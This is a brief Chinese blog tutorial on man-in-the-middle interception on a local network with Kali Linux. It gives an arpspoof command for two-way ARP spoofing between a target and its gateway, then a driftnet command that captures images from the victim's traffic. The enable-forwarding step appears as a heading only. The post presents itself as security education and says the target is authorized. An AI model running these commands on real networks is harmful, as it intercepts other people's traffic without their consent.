内网渗透:Kali三步实现内网ARP欺骗

版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/SouthWind0/article/details/82805635

内网渗透:Kali三步实现内网ARP欺骗

声明:本篇文章仅限用于学习信息安全技术,请勿用于非法途径!

1.1双向欺骗

攻击者(kali):192.168.1.105

目标机器(已取得授权):192.168.1.101

网关:192.168.1.1

kali欺骗目标机器说自己是192.168.1.1,同时欺骗网关说自己是192.168.1.101。

命令:arpspoof –i eth0 –t 192.168.1.101 –r 192.168.1.1

1.2开启转发

1.3使用driftnet监听

1)保存到本地

2)直接显示

命令:driftnet -i eth0

猜你喜欢

转载自blog.csdn.net/SouthWind0/article/details/82805635